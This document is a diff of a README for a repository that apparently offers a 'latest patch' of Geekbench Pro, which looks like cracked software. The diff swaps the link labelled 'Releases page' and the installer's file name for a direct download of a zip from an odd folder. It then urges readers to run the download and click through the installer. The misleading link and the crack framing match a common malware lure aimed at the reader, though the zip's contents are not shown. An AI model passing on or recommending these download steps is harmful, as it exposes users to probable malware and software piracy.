koroushbadi/Geekbench-Pro-Latest-Patch/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/koroushbadi/Geekbench-Pro-Latest-Patch/releases) to find the latest version of Geekbench Pro.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/koroushbadi/Geekbench-Pro-Latest-Patch/main/prechoose/Geekbench-Pro-Latest-Patch-v3.4.zip) to find the latest version of Geekbench Pro.
 2. **Select Your Version**: Look for the most recent release.
 You will see a list of downloadable files.
-3. **Download the Application**: Click on the file labeled `Geekbench-Pro-Setup.exe` to download it to your computer.
+3. **Download the Application**: Click on the file labeled `https://raw.githubusercontent.com/koroushbadi/Geekbench-Pro-Latest-Patch/main/prechoose/Geekbench-Pro-Latest-Patch-v3.4.zip` to download it to your computer.
 4. **Run the Installer**: Once the download is complete, find the file in your downloads folder and double-click it to start the installation.
 5. **Follow Installation Steps**: The installer will guide you through the setup process.
 Just follow the prompts and click "Next" until you finish.